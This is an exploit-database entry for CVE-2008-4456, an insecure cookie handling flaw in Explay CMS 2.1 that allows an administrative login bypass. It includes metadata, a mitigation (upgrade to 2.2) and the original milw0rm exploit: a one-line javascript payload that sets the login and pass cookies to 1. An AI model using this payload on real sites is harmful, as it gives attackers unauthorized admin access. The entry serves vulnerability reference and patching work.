header-logo
Suggest Exploit
vendor:
Explay CMS
by:
Stack
7.5
CVSS
HIGH
Insecure Cookie Handling
614
CWE
Product Name: Explay CMS
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: YES
Related CWE: CVE-2008-4456
CPE: a:explay:explay_cms
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Explay CMS <= 2.1 Insecure Cookie Handling Vulnerability

Explay CMS version 2.1 and prior is vulnerable to an insecure cookie handling vulnerability. This vulnerability allows an attacker to gain administrative access to the CMS. The attacker can exploit this vulnerability by setting the login and pass cookies to 1.

Mitigation:

Upgrade to Explay CMS version 2.2 or later.
Source

Exploit-DB raw data:

###############################################################################################
[+] Explay CMS <= 2.1 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack                
[+] Greetz : All my freind               
################################################################################################
---
exploit:
javascript:document.cookie = "login=1; path=/"; document.cookie = "pass=1; path=/";

# milw0rm.com [2008-09-20]